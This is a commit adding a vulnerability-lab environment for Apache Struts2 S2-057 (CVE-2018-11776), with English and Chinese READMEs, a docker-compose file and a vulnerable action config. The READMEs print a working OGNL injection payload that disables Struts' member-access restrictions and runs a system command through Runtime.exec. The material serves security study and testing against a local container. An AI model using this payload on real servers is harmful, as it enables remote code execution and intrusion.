first commit

struts2/s2-057/README.md

@@ -0,0 +1,50 @@
+# Struts2 S2-057 Remote Code Execution Vulnerablity (CVE-2018-11776)
+
+Affected Version: <= Struts 2.3.34, Struts 2.5.16
+
+Details:
+
+ - https://cwiki.apache.org/confluence/display/WW/S2-057
+ - https://lgtm.com/blog/apache_struts_CVE-2018-11776
+ - https://xz.aliyun.com/t/2618
+ - https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
+
+## Setup
+
+Start the Struts 2.3.34 environment:
+
+```
+docker compose up -d
+```
+
+After the environment is started, visit `http://your-ip:8080/showcase/` and you will see the Struts2 test page.
+
+## Exploit
+
+S2-057 requires the following conditions:
+
+  - `alwaysSelectFullNamespace` is true
+  - The action element does not have the namespace attribute set, or a wildcard is used
+
+The namespace will be passed by the user from uri and parsed as an OGNL expression, eventually cause remote code execution vulnerablity.
+
+Payload:
+
+```
+http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
+```
+
+![](1.png)
+
+It can be seen that the result of 233*233 has been returned in the Location header.
+
+Use payload from [S2-057 vulnerability analysis and POC](https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg):
+
+```
+${
+(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
+```
+
+Result:
+
+![](2.png)

struts2/s2-057/README.zh-cn.md

@@ -0,0 +1,50 @@
+# Struts2 S2-057 远程命令执行漏洞（CVE-2018-11776）
+
+当Struts2的配置满足以下条件时：
+
+ - alwaysSelectFullNamespace值为true
+ - action元素未设置namespace属性，或使用了通配符
+
+namespace将由用户从uri传入，并作为OGNL表达式计算，最终造成任意命令执行漏洞。
+
+影响版本: 小于等于 Struts 2.3.34 与 Struts 2.5.16
+
+漏洞详情:
+
+ - https://cwiki.apache.org/confluence/display/WW/S2-057
+ - https://lgtm.com/blog/apache_struts_CVE-2018-11776
+ - https://xz.aliyun.com/t/2618
+ - https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
+
+## 漏洞环境
+
+启动满足条件的 Struts 2.3.34 环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/showcase/`，将可以看到Struts2的测试页面。
+
+## 漏洞复现
+
+测试OGNL表达式`${233*233}`：
+
+```
+http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
+```
+
+![](1.png)
+
+可见233*233的结果已返回在Location头中。
+
+使用[S2-057原理分析与复现过程（POC）](https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg)中给出的执行任意命令的OGNL表达式：
+
+```
+${
+(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
+```
+
+可见，id命令已成功执行：
+
+![](2.png)

struts2/s2-057/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ struts2:
+   image: vulhub/struts2:2.3.34-showcase
+   volumes:
+    - ./struts-actionchaining.xml:/usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts-actionchaining.xml
+   ports:
+    - "8080:8080"

struts2/s2-057/struts-actionchaining.xml

@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<!DOCTYPE struts PUBLIC
+        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
+        "http://struts.apache.org/dtds/struts-2.3.dtd">
+
+<struts>
+        <package name="actionchaining" extends="struts-default">
+                <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
+                    <result type="redirectAction">
+                        <param name = "actionName">register2</param>
+                    </result>
+                </action>
+        </package>
+</struts>